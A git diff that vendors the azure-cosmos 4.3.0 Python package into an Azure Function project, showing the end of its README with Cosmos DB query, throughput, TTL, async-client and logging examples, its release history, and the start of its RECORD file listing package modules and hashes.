dict(name='@model', value='Model 7') + ], + enable_cross_partition_query=True +) +for item in discontinued_items: + print(json.dumps(item, indent=True)) +``` + +For more information on querying Cosmos DB databases using the SQL API, see [Query Azure Cosmos DB data with SQL queries][cosmos_sql_queries]. + +### Get database properties + +Get and display the properties of a database: + +```Python +from azure.cosmos import CosmosClient +import os +import json + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +DATABASE_NAME = 'testDatabase' +database = client.get_database_client(DATABASE_NAME) +properties = database.read() +print(json.dumps(properties)) +``` + +### Get database and container throughputs + +Get and display the throughput values of a database and of a container with dedicated throughput: + +```Python +from azure.cosmos import CosmosClient +import os +import json + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) + +# Database +DATABASE_NAME = 'testDatabase' +database = client.get_database_client(DATABASE_NAME) +db_offer = database.read_offer() +print('Found Offer \'{0}\' for Database \'{1}\' and its throughput is \'{2}\''.format(db_offer.properties['id'], database.id, db_offer.properties['content']['offerThroughput'])) + +# Container with dedicated throughput only. Will return error "offer not found" for containers without dedicated throughput +CONTAINER_NAME = 'testContainer' +container = database.get_container_client(CONTAINER_NAME) +container_offer = container.read_offer() +print('Found Offer \'{0}\' for Container \'{1}\' and its throughput is \'{2}\''.format(container_offer.properties['id'], container.id, container_offer.properties['content']['offerThroughput'])) +``` + + +### Modify container properties + +Certain properties of an existing container can be modified. This example sets the default time to live (TTL) for items in the container to 10 seconds: + +```Python +from azure.cosmos import CosmosClient, PartitionKey +import os +import json + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +DATABASE_NAME = 'testDatabase' +database = client.get_database_client(DATABASE_NAME) +CONTAINER_NAME = 'products' +container = database.get_container_client(CONTAINER_NAME) + +database.replace_container( + container, + partition_key=PartitionKey(path="/productName"), + default_ttl=10, +) +# Display the new TTL setting for the container +container_props = container.read() +print(json.dumps(container_props['defaultTtl'])) +``` + +For more information on TTL, see [Time to Live for Azure Cosmos DB data][cosmos_ttl]. + +### Using the asynchronous client (Preview) + +The asynchronous cosmos client is a separate client that looks and works in a similar fashion to the existing synchronous client. However, the async client needs to be imported separately and its methods need to be used with the async/await keywords. +The Async client needs to be initialized and closed after usage, which can be done manually or with the use of a context manager. The example below shows how to do so manually. + +```Python +from azure.cosmos.aio import CosmosClient +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +DATABASE_NAME = 'testDatabase' +CONTAINER_NAME = 'products' + +async def create_products(): + client = CosmosClient(URL, credential=KEY) + database = client.get_database_client(DATABASE_NAME) + container = database.get_container_client(CONTAINER_NAME) + for i in range(10): + await container.upsert_item({ + 'id': 'item{0}'.format(i), + 'productName': 'Widget', + 'productModel': 'Model {0}'.format(i) + } + ) + await client.close() # the async client must be closed manually if it's not initialized in a with statement +``` + +Instead of manually opening and closing the client, it is highly recommended to use the `async with` keywords. This creates a context manager that will initialize and later close the client once you're out of the statement. The example below shows how to do so. + +```Python +from azure.cosmos.aio import CosmosClient +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +DATABASE_NAME = 'testDatabase' +CONTAINER_NAME = 'products' + +async def create_products(): + async with CosmosClient(URL, credential=KEY) as client: # the with statement will automatically initialize and close the async client + database = client.get_database_client(DATABASE_NAME) + container = database.get_container_client(CONTAINER_NAME) + for i in range(10): + await container.upsert_item({ + 'id': 'item{0}'.format(i), + 'productName': 'Widget', + 'productModel': 'Model {0}'.format(i) + } + ) +``` + +### Queries with the asynchronous client (Preview) + +Unlike the synchronous client, the async client does not have an `enable_cross_partition` flag in the request. Queries without a specified partition key value will attempt to do a cross partition query by default. + +Query results can be iterated, but the query's raw output returns an asynchronous iterator. This means that each object from the iterator is an awaitable object, and does not yet contain the true query result. In order to obtain the query results you can use an async for loop, which awaits each result as you iterate on the object, or manually await each query result as you iterate over the asynchronous iterator. + +Since the query results are an asynchronous iterator, they can't be cast into lists directly; instead, if you need to create lists from your results, use an async for loop or Python's list comprehension to populate a list: + +```Python +from azure.cosmos.aio import CosmosClient +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +DATABASE_NAME = 'testDatabase' +database = client.get_database_client(DATABASE_NAME) +CONTAINER_NAME = 'products' +container = database.get_container_client(CONTAINER_NAME) + +async def create_lists(): + results = container.query_items( + query='SELECT * FROM products p WHERE p.productModel = "Model 2"') + + # iterates on "results" iterator to asynchronously create a complete list of the actual query results + + item_list = [] + async for item in results: + item_list.append(item) + + # Asynchronously creates a complete list of the actual query results. This code performs the same action as the for-loop example above. + item_list = [item async for item in results] + await client.close() +``` +## Troubleshooting + +### General + +When you interact with Cosmos DB using the Python SDK, exceptions returned by the service correspond to the same HTTP status codes returned for REST API requests: + +[HTTP Status Codes for Azure Cosmos DB][cosmos_http_status_codes] + +For example, if you try to create a container using an ID (name) that's already in use in your Cosmos DB database, a `409` error is returned, indicating the conflict. In the following snippet, the error is handled gracefully by catching the exception and displaying additional information about the error. + +```Python +try: + database.create_container(id=CONTAINER_NAME, partition_key=PartitionKey(path="/productName")) +except exceptions.CosmosResourceExistsError: + print("""Error creating container +HTTP status code 409: The ID (name) provided for the container is already in use. +The container name must be unique within the database.""") + +``` +### Logging + +This library uses the standard +[logging](https://docs.python.org/3.5/library/logging.html) library for logging. +Basic information about HTTP sessions (URLs, headers, etc.) is logged at INFO +level. + +Detailed DEBUG level logging, including request/response bodies and unredacted +headers, can be enabled on a client with the `logging_enable` argument: +```python +import sys +import logging +from azure.cosmos import CosmosClient + +# Create a logger for the 'azure' SDK +logger = logging.getLogger('azure') +logger.setLevel(logging.DEBUG) + +# Configure a console output +handler = logging.StreamHandler(stream=sys.stdout) +logger.addHandler(handler) + +# This client will log detailed information about its HTTP sessions, at DEBUG level +client = CosmosClient(URL, credential=KEY, logging_enable=True) +``` + +Similarly, `logging_enable` can enable detailed logging for a single operation, +even when it isn't enabled for the client: +```py +database = client.create_database(DATABASE_NAME, logging_enable=True) +``` + +## Next steps + +For more extensive documentation on the Cosmos DB service, see the [Azure Cosmos DB documentation][cosmos_docs] on docs.microsoft.com. + + +[azure_cli]: https://docs.microsoft.com/cli/azure +[azure_portal]: https://portal.azure.com +[azure_sub]: https://azure.microsoft.com/free/ +[cloud_shell]: https://docs.microsoft.com/azure/cloud-shell/overview +[cosmos_account_create]: https://docs.microsoft.com/azure/cosmos-db/how-to-manage-database-account +[cosmos_account]: https://docs.microsoft.com/azure/cosmos-db/account-overview +[cosmos_container]: https://docs.microsoft.com/azure/cosmos-db/databases-containers-items#azure-cosmos-containers +[cosmos_database]: https://docs.microsoft.com/azure/cosmos-db/databases-containers-items#azure-cosmos-databases +[cosmos_docs]: https://docs.microsoft.com/azure/cosmos-db/ +[cosmos_samples]: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos/samples +[cosmos_pypi]: https://pypi.org/project/azure-cosmos/ +[cosmos_http_status_codes]: https://docs.microsoft.com/rest/api/cosmos-db/http-status-codes-for-cosmosdb +[cosmos_item]: https://docs.microsoft.com/azure/cosmos-db/databases-containers-items#azure-cosmos-items +[cosmos_request_units]: https://docs.microsoft.com/azure/cosmos-db/request-units +[cosmos_resources]: https://docs.microsoft.com/azure/cosmos-db/databases-containers-items +[cosmos_sql_queries]: https://docs.microsoft.com/azure/cosmos-db/how-to-sql-query +[cosmos_ttl]: https://docs.microsoft.com/azure/cosmos-db/time-to-live +[python]: https://www.python.org/downloads/ +[ref_container_delete_item]: https://aka.ms/azsdk-python-cosmos-ref-delete-item +[ref_container_query_items]: https://aka.ms/azsdk-python-cosmos-ref-query-items +[ref_container_upsert_item]: https://aka.ms/azsdk-python-cosmos-ref-upsert-item +[ref_container]: https://aka.ms/azsdk-python-cosmos-ref-container +[ref_cosmos_sdk]: https://aka.ms/azsdk-python-cosmos-ref +[ref_cosmosclient_create_database]: https://aka.ms/azsdk-python-cosmos-ref-create-database +[ref_cosmosclient]: https://aka.ms/azsdk-python-cosmos-ref-cosmos-client +[ref_database]: https://aka.ms/azsdk-python-cosmos-ref-database +[ref_httpfailure]: https://aka.ms/azsdk-python-cosmos-ref-http-failure +[sample_database_mgmt]: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos/samples/database_management.py +[sample_document_mgmt]: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos/samples/document_management.py +[sample_examples_misc]: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos/samples/examples.py +[source_code]: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos +[venv]: https://docs.python.org/3/library/venv.html +[virtualenv]: https://virtualenv.pypa.io + +## Contributing + +This project welcomes contributions and suggestions. Most contributions require you to agree to a +Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us +the rights to use your contribution. For details, visit https://cla.microsoft.com. + +When you submit a pull request, a CLA-bot will automatically determine whether you need to provide +a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions +provided by the bot. You will only need to do this once across all repos using our CLA. + +This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). +For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or +contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments. + + +## Release History + +### 4.3.0 (2022-05-23) +#### Features Added +- GA release of Async I/O APIs, including all changes from 4.3.0b1 to 4.3.0b4. + +#### Breaking Changes +- Method signatures have been updated to use keyword arguments instead of positional arguments for most method options in the async client. +- Bugfix: Automatic Id generation for items was turned on for `upsert_items()` method when no 'id' value was present in document body. +Method call will now require an 'id' field to be present in the document body. + +#### Other Changes +- Deprecated offer-named methods in favor of their new throughput-named counterparts (`read_offer` -> `get_throughput`). +- Marked the GetAuthorizationHeader method for deprecation since it will no longer be public in a future release. +- Added samples showing how to configure retry options for both the sync and async clients. +- Deprecated the `connection_retry_policy` and `retry_options` options in the sync client. +- Added user warning to non-query methods trying to use `populate_query_metrics` options. + +### 4.3.0b4 (2022-04-07) + +#### Features Added +- Added support for AAD authentication for the async client. +- Added support for AAD authentication for the sync client. + +#### Other Changes +- Changed `_set_partition_key` return typehint in async client. + +### 4.3.0b3 (2022-03-10) + +>[WARNING] +>The default `Session` consistency bugfix will impact customers whose database accounts have a `Bounded Staleness` or `Strong` +> consistency level, and were previously not sending `Session` as a consistency_level parameter when initializing +> their clients. +> Default consistency level for the sync and async clients is no longer "Session" and will instead be set to the + consistency level of the user's cosmos account setting on initialization if not passed during client initialization. +> Please see [Consistency Levels in Azure Cosmos DB](https://docs.microsoft.com/azure/cosmos-db/consistency-levels) +> for more details on consistency levels, or the README section on this change [here](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos#note-on-client-consistency-levels). + +#### Features Added +- Added new **provisional** `max_integrated_cache_staleness_in_ms` parameter to read item and query items APIs in order + to make use of the **preview** CosmosDB integrated cache functionality. + Please see [Azure Cosmos DB integrated cache](https://docs.microsoft.com/azure/cosmos-db/integrated-cache) for more details. +- Added support for split-proof queries for the async client. + +### Bugs fixed +- Default consistency level for the sync and async clients is no longer `Session` and will instead be set to the + consistency level of the user's cosmos account setting on initialization if not passed during client initialization. + This change will impact client application in terms of RUs and latency. Users relying on default `Session` consistency + will need to pass it explicitly if their account consistency is different than `Session`. + Please see [Consistency Levels in Azure Cosmos DB](https://docs.microsoft.com/azure/cosmos-db/consistency-levels) for more details. +- Fixed invalid request body being sent when passing in `serverScript` body parameter to replace operations for trigger, sproc and udf resources. +- Moved `is_system_key` logic in async client. +- Fixed TypeErrors not being thrown when passing in invalid connection retry policies to the client. + +### 4.3.0b2 (2022-01-25) + +This version and all future versions will require Python 3.6+. Python 2.7 is no longer supported. +We will also be removing support for Python 3.6 and will only support Python 3.7+ starting December 2022. + +#### Features Added +- Added support for split-proof queries for the sync client. + +#### Other Changes +- Added async user agent for async client. + +### 4.3.0b1 (2021-12-14) + +#### Features Added +- Added language native async i/o client. + +### 4.2.0 (2020-10-08) + +**Bug fixes** +- Fixed bug where continuation token is not honored when query_iterable is used to get results by page. Issue #13265. +- Fixed bug where resource tokens not being honored for document reads and deletes. Issue #13634. + +**New features** +- Added support for passing partitionKey while querying changefeed. Issue #11689. + +### 4.1.0 (2020-08-10) + +- Added deprecation warning for "lazy" indexing mode. The backend no longer allows creating containers with this mode and will set them to consistent instead. + +**New features** +- Added the ability to set the analytical storage TTL when creating a new container. + +**Bug fixes** +- Fixed support for dicts as inputs for get_client APIs. +- Fixed Python 2/3 compatibility in query iterators. +- Fixed type hint error. Issue #12570 - thanks @sl-sandy. +- Fixed bug where options headers were not added to upsert_item function. Issue #11791 - thank you @aalapatirvbd. +- Fixed error raised when a non string ID is used in an item. It now raises TypeError rather than AttributeError. Issue #11793 - thank you @Rabbit994. + + +### 4.0.0 (2020-05-20) + +- Stable release. +- Added HttpLoggingPolicy to pipeline to enable passing in a custom logger for request and response headers. + + +## 4.0.0b6 + +- Fixed bug in synchronized_request for media APIs. +- Removed MediaReadMode and MediaRequestTimeout from ConnectionPolicy as media requests are not supported. + + +## 4.0.0b5 + +- azure.cosmos.errors module deprecated and replaced by azure.cosmos.exceptions +- The access condition parameters (`access_condition`, `if_match`, `if_none_match`) have been deprecated in favor of separate `match_condition` and `etag` parameters. +- Fixed bug in routing map provider. +- Added query Distinct, Offset and Limit support. +- Default document query execution context now used for + - ChangeFeed queries + - single partition queries (partitionkey, partitionKeyRangeId is present in options) + - Non document queries +- Errors out for aggregates on multiple partitions, with enable cross partition query set to true, but no "value" keyword present +- Hits query plan endpoint for other scenarios to fetch query plan +- Added `__repr__` support for Cosmos entity objects. +- Updated documentation. + + +## 4.0.0b4 + +- Added support for a `timeout` keyword argument to all operations to specify an absolute timeout in seconds + within which the operation must be completed. If the timeout value is exceeded, a `azure.cosmos.errors.CosmosClientTimeoutError` will be raised. +- Added a new `ConnectionRetryPolicy` to manage retry behaviour during HTTP connection errors. +- Added new constructor and per-operation configuration keyword arguments: + - `retry_total` - Maximum retry attempts. + - `retry_backoff_max` - Maximum retry wait time in seconds. + - `retry_fixed_interval` - Fixed retry interval in milliseconds. + - `retry_read` - Maximum number of socket read retry attempts. + - `retry_connect` - Maximum number of connection error retry attempts. + - `retry_status` - Maximum number of retry attempts on error status codes. + - `retry_on_status_codes` - A list of specific status codes to retry on. + - `retry_backoff_factor` - Factor to calculate wait time between retry attempts. + +## 4.0.0b3 + +- Added `create_database_if_not_exists()` and `create_container_if_not_exists` functionalities to CosmosClient and Database respectively. + +## 4.0.0b2 + +Version 4.0.0b2 is the second iteration in our efforts to build a more Pythonic client library. + +**Breaking changes** + +- The client connection has been adapted to consume the HTTP pipeline defined in `azure.core.pipeline`. +- Interactive objects have now been renamed as proxies. This includes: + - `Database` -> `DatabaseProxy` + - `User` -> `UserProxy` + - `Container` -> `ContainerProxy` + - `Scripts` -> `ScriptsProxy` +- The constructor of `CosmosClient` has been updated: + - The `auth` parameter has been renamed to `credential` and will now take an authentication type directly. This means the master key value, a dictionary of resource tokens, or a list of permissions can be passed in. However the old dictionary format is still supported. + - The `connection_policy` parameter has been made a keyword only parameter, and while it is still supported, each of the individual attributes of the policy can now be passed in as explicit keyword arguments: + - `request_timeout` + - `media_request_timeout` + - `connection_mode` + - `media_read_mode` + - `proxy_config` + - `enable_endpoint_discovery` + - `preferred_locations` + - `multiple_write_locations` +- A new classmethod constructor has been added to `CosmosClient` to enable creation via a connection string retrieved from the Azure portal. +- Some `read_all` operations have been renamed to `list` operations: + - `CosmosClient.read_all_databases` -> `CosmosClient.list_databases` + - `Container.read_all_conflicts` -> `ContainerProxy.list_conflicts` + - `Database.read_all_containers` -> `DatabaseProxy.list_containers` + - `Database.read_all_users` -> `DatabaseProxy.list_users` + - `User.read_all_permissions` -> `UserProxy.list_permissions` +- All operations that take `request_options` or `feed_options` parameters, these have been moved to keyword only parameters. In addition, while these options dictionaries are still supported, each of the individual options within the dictionary are now supported as explicit keyword arguments. +- The error heirarchy is now inherited from `azure.core.AzureError` instead of `CosmosError` which has been removed. + - `HTTPFailure` has been renamed to `CosmosHttpResponseError` + - `JSONParseFailure` has been removed and replaced by `azure.core.DecodeError` + - Added additional errors for specific response codes: + - `CosmosResourceNotFoundError` for status 404 + - `CosmosResourceExistsError` for status 409 + - `CosmosAccessConditionFailedError` for status 412 +- `CosmosClient` can now be run in a context manager to handle closing the client connection. +- Iterable responses (e.g. query responses and list responses) are now of type `azure.core.paging.ItemPaged`. The method `fetch_next_block` has been replaced by a secondary iterator, accessed by the `by_page` method. + +## 4.0.0b1 + +Version 4.0.0b1 is the first preview of our efforts to create a user-friendly and Pythonic client library for Azure Cosmos. For more information about this, and preview releases of other Azure SDK libraries, please visit https://aka.ms/azure-sdk-preview1-python. + +**Breaking changes: New API design** + +- Operations are now scoped to a particular client: + - `CosmosClient`: This client handles account-level operations. This includes managing service properties and listing the databases within an account. + - `Database`: This client handles database-level operations. This includes creating and deleting containers, users and stored procedurs. It can be accessed from a `CosmosClient` instance by name. + - `Container`: This client handles operations for a particular container. This includes querying and inserting items and managing properties. + - `User`: This client handles operations for a particular user. This includes adding and deleting permissions and managing user properties. + + These clients can be accessed by navigating down the client hierarchy using the `get__client` method. For full details on the new API, please see the [reference documentation](https://aka.ms/azsdk-python-cosmos-ref). +- Clients are accessed by name rather than by Id. No need to concatenate strings to create links. +- No more need to import types and methods from individual modules. The public API surface area is available directly in the `azure.cosmos` package. +- Individual request properties can be provided as keyword arguments rather than constructing a separate `RequestOptions` instance. + +## 3.0.2 + +- Added Support for MultiPolygon Datatype +- Bug Fix in Session Read Retry Policy +- Bug Fix for Incorrect padding issues while decoding base 64 strings + +## 3.0.1 + +- Bug fix in LocationCache +- Bug fix endpoint retry logic +- Fixed documentation + +## 3.0.0 + +- Multi-region write support added +- Naming changes + - DocumentClient to CosmosClient + - Collection to Container + - Document to Item + - Package name updated to "azure-cosmos" + - Namespace updated to "azure.cosmos" + +## 2.3.3 + +- Added support for proxy +- Added support for reading change feed +- Added support for collection quota headers +- Bugfix for large session tokens issue +- Bugfix for ReadMedia API +- Bugfix in partition key range cache + +## 2.3.2 + +- Added support for default retries on connection issues. + +## 2.3.1 + +- Updated documentation to reference Azure Cosmos DB instead of Azure DocumentDB. + +## 2.3.0 + +- This SDK version requires the latest version of Azure Cosmos DB Emulator available for download from https://aka.ms/cosmosdb-emulator. + +## 2.2.1 + +- bugfix for aggregate dict +- bugfix for trimming slashes in the resource link +- tests for unicode encoding + +## 2.2.0 + +- Added support for Request Unit per Minute (RU/m) feature. +- Added support for a new consistency level called ConsistentPrefix. + +## 2.1.0 + +- Added support for aggregation queries (COUNT, MIN, MAX, SUM, and AVG). +- Added an option for disabling SSL verification when running against DocumentDB Emulator. +- Removed the restriction of dependent requests module to be exactly 2.10.0. +- Lowered minimum throughput on partitioned collections from 10,100 RU/s to 2500 RU/s. +- Added support for enabling script logging during stored procedure execution. +- REST API version bumped to '2017-01-19' with this release. + +## 2.0.1 + +- Made editorial changes to documentation comments. + +## 2.0.0 + +- Added support for Python 3.5. +- Added support for connection pooling using the requests module. +- Added support for session consistency. +- Added support for TOP/ORDERBY queries for partitioned collections. + +## 1.9.0 + +- Added retry policy support for throttled requests. (Throttled requests receive a request rate too large exception, error code 429.) + By default, DocumentDB retries nine times for each request when error code 429 is encountered, honoring the retryAfter time in the response header. + A fixed retry interval time can now be set as part of the RetryOptions property on the ConnectionPolicy object if you want to ignore the retryAfter time returned by server between the retries. + DocumentDB now waits for a maximum of 30 seconds for each request that is being throttled (irrespective of retry count) and returns the response with error code 429. + This time can also be overriden in the RetryOptions property on ConnectionPolicy object. + +- DocumentDB now returns x-ms-throttle-retry-count and x-ms-throttle-retry-wait-time-ms as the response headers in every request to denote the throttle retry count + and the cummulative time the request waited between the retries. + +- Removed the RetryPolicy class and the corresponding property (retry_policy) exposed on the document_client class and instead introduced a RetryOptions class + exposing the RetryOptions property on ConnectionPolicy class that can be used to override some of the default retry options. + +## 1.8.0 + +- Added the support for geo-replicated database accounts. +- Test fixes to move the global host and masterKey into the individual test classes. + +## 1.7.0 + +- Added the support for Time To Live(TTL) feature for documents. + +## 1.6.1 + +- Bug fixes related to server side partitioning to allow special characters in partitionkey path. + +## 1.6.0 + +- Added the support for server side partitioned collections feature. + +## 1.5.0 + +- Added Client-side sharding framework to the SDK. Implemented HashPartionResolver and RangePartitionResolver classes. + +## 1.4.2 + +- Implement Upsert. New UpsertXXX methods added to support Upsert feature. +- Implement ID Based Routing. No public API changes, all changes internal. + +## 1.3.0 + +- Release skipped to bring version number in alignment with other SDKs + +## 1.2.0 + +- Supports GeoSpatial index. +- Validates id property for all resources. Ids for resources cannot contain ?, /, #, \\, characters or end with a space. +- Adds new header "index transformation progress" to ResourceResponse. + +## 1.1.0 + +- Implements V2 indexing policy + +## 1.0.1 + +- Supports proxy connection + + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/RECORD new file mode 100644 index 0000000..dc0209e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/RECORD @@ -0,0 +1,152 @@ +azure/cosmos/__init__.py,sha256=gOSzcKpMT26_L9a2GlfOC39Qz2txopl6EGgVLTeCh7Q,2132 +azure/cosmos/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/__pycache__/_auth_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_base.cpython-39.pyc,, +azure/cosmos/__pycache__/_constants.cpython-39.pyc,, +azure/cosmos/__pycache__/_cosmos_client_connection.cpython-39.pyc,, +azure/cosmos/__pycache__/_default_retry_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_endpoint_discovery_retry_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_global_endpoint_manager.cpython-39.pyc,, +azure/cosmos/__pycache__/_gone_retry_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_location_cache.cpython-39.pyc,, +azure/cosmos/__pycache__/_partition.cpython-39.pyc,, +azure/cosmos/__pycache__/_query_iterable.cpython-39.pyc,, +azure/cosmos/__pycache__/_range.cpython-39.pyc,, +azure/cosmos/__pycache__/_range_partition_resolver.cpython-39.pyc,, +azure/cosmos/__pycache__/_request_object.cpython-39.pyc,, +azure/cosmos/__pycache__/_resource_throttle_retry_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_retry_options.cpython-39.pyc,, +azure/cosmos/__pycache__/_retry_utility.cpython-39.pyc,, +azure/cosmos/__pycache__/_runtime_constants.cpython-39.pyc,, +azure/cosmos/__pycache__/_session.cpython-39.pyc,, +azure/cosmos/__pycache__/_session_retry_policy.cpython-39.pyc,, +azure/cosmos/__pycache__/_synchronized_request.cpython-39.pyc,, +azure/cosmos/__pycache__/_utils.cpython-39.pyc,, +azure/cosmos/__pycache__/_vector_session_token.cpython-39.pyc,, +azure/cosmos/__pycache__/_version.cpython-39.pyc,, +azure/cosmos/__pycache__/auth.cpython-39.pyc,, +azure/cosmos/__pycache__/container.cpython-39.pyc,, +azure/cosmos/__pycache__/cosmos_client.cpython-39.pyc,, +azure/cosmos/__pycache__/database.cpython-39.pyc,, +azure/cosmos/__pycache__/diagnostics.cpython-39.pyc,, +azure/cosmos/__pycache__/documents.cpython-39.pyc,, +azure/cosmos/__pycache__/errors.cpython-39.pyc,, +azure/cosmos/__pycache__/exceptions.cpython-39.pyc,, +azure/cosmos/__pycache__/http_constants.cpython-39.pyc,, +azure/cosmos/__pycache__/offer.cpython-39.pyc,, +azure/cosmos/__pycache__/partition_key.cpython-39.pyc,, +azure/cosmos/__pycache__/permission.cpython-39.pyc,, +azure/cosmos/__pycache__/scripts.cpython-39.pyc,, +azure/cosmos/__pycache__/user.cpython-39.pyc,, +azure/cosmos/_auth_policy.py,sha256=SuAkDru_A6AG1QjS3Xe2xwRwv7uS0ZZIIc6BXDdGYG0,7198 +azure/cosmos/_base.py,sha256=7uwjBGjtUnbhWG1ksSlg_CsAnSbPD2FUs5AI8raJ-5k,25428 +azure/cosmos/_constants.py,sha256=YyRc-8arRJq8trVLTWxJvo7-LoRYna4ubqIMYHk73eU,1753 +azure/cosmos/_cosmos_client_connection.py,sha256=K1xkz-8pFlw8XkcP0JrQNLDzNxcuwzj0y-V1YB6qmPY,93484 +azure/cosmos/_default_retry_policy.py,sha256=ddOHZrlCykcLO32Om6wgflBgWLQfLMRINQGwP3ygldM,3274 +azure/cosmos/_endpoint_discovery_retry_policy.py,sha256=f46WVx5vyIo5kEA1mc6alOGhM9P8SXW0cyBC12JBowM,4685 +azure/cosmos/_execution_context/__init__.py,sha256=cz3FOUlbIIsSPAndnNdAwxvJ7YqW04N_NY5jjZdDOsY,1121 +azure/cosmos/_execution_context/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/aggregators.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/base_execution_context.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/document_producer.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/endpoint_component.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/execution_dispatcher.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/multi_execution_aggregator.cpython-39.pyc,, +azure/cosmos/_execution_context/__pycache__/query_execution_info.cpython-39.pyc,, +azure/cosmos/_execution_context/aggregators.py,sha256=lTizSV8lfzWsrAPfc-xYGpmojP1URhKrucx8jymfOqU,3295 +azure/cosmos/_execution_context/aio/__init__.py,sha256=tvxon2u0FtnFLeIOSqCr9klTHhXvSLp1TsmZ4RhwOk0,1121 +azure/cosmos/_execution_context/aio/__pycache__/__init__.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/_queue_async_helper.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/base_execution_context.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/document_producer.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/endpoint_component.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/execution_dispatcher.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/__pycache__/multi_execution_aggregator.cpython-39.pyc,, +azure/cosmos/_execution_context/aio/_queue_async_helper.py,sha256=RLyCjUcJUUod_J0An9FdbST4lrLRdUwmaQCnhCF8OW0,3220 +azure/cosmos/_execution_context/aio/base_execution_context.py,sha256=_io2sH6hsaUKn-ZyH6WxpdkSr7ZoNjMOwKQaivrNAlY,6203 +azure/cosmos/_execution_context/aio/document_producer.py,sha256=uYf2k7t6Q82fNfScYIpa0jKo2Nq7RJ8GmOcVHtTybvk,9216 +azure/cosmos/_execution_context/aio/endpoint_component.py,sha256=abYr6zgwZojk7mCNPsqFq44HMIAC1wiQCpZBvHAB75k,7370 +azure/cosmos/_execution_context/aio/execution_dispatcher.py,sha256=sjoSNkKkt2HJF7yOvP4elXLMMgg3IakRPsMtRv_Mbys,8954 +azure/cosmos/_execution_context/aio/multi_execution_aggregator.py,sha256=0__wggYV0PPGgNyTcH7RD2LtIUrw4OIxMn5TuaXtBhY,8507 +azure/cosmos/_execution_context/base_execution_context.py,sha256=IifxreWPVtTuGmbmOAU2TM_0JaKU0WxgY4dj5OGiBoM,6113 +azure/cosmos/_execution_context/document_producer.py,sha256=SfwgSi2oJOvrKThhrH11FcfG6VnqyW8Z3RN17G-Citk,9259 +azure/cosmos/_execution_context/endpoint_component.py,sha256=5PESZmuznx7zCPlGUCJGpXCBqNULDmZEqBtjr-6tzlI,7519 +azure/cosmos/_execution_context/execution_dispatcher.py,sha256=47KdxImr0A4q2bYnOLdi9CNLV7o0tIigdihpwbpDpxw,9125 +azure/cosmos/_execution_context/multi_execution_aggregator.py,sha256=QEVXCuy7OtSF9WQyYNoINzwmBG1hOwhrP420asHlGHI,8091 +azure/cosmos/_execution_context/query_execution_info.py,sha256=Xw0pxUsKRZi-keL-3FFoXU0YlurFbZoyIYEGyyxHGcI,4697 +azure/cosmos/_global_endpoint_manager.py,sha256=ahLAGrkSIj71AiuiwNmdtZguA_Pjk5H1liXZ8wGlhiI,7818 +azure/cosmos/_gone_retry_policy.py,sha256=uT1DpI3ivNb30qLppWpWCY0VNq4XL6LdDHIAL4Y1lC8,2302 +azure/cosmos/_location_cache.py,sha256=fkL-9YkmeekoX_RrP0LDQeFwmUHfzCs2clqjaZeRrEA,14937 +azure/cosmos/_partition.py,sha256=hF_SRVOyg9crP-7iRqqHLsNDRIA6jct9490bM6rjXBM,2625 +azure/cosmos/_query_iterable.py,sha256=XSUfO2YRhtyHZ2qHPyGFeFz-bC8ghSpKsXlzRR4oBfA,3996 +azure/cosmos/_range.py,sha256=7lsoxGPoR1B5vBGmjdBouN32yMRxYmNRBPn0iOrmLcU,2806 +azure/cosmos/_range_partition_resolver.py,sha256=pcfMbQw1u-iMs1oggei-3m3EA1ljeAAugIBf9sDy4g8,4798 +azure/cosmos/_request_object.py,sha256=5DRWuIIcLeT4jIjKcfvJWTZMbjQSdDxqdIYL_PAQPko,2258 +azure/cosmos/_resource_throttle_retry_policy.py,sha256=8ZKQhwZtdU_7Rc7efN13GQ6OEaMAKPLa8JG0BOzLlqk,2995 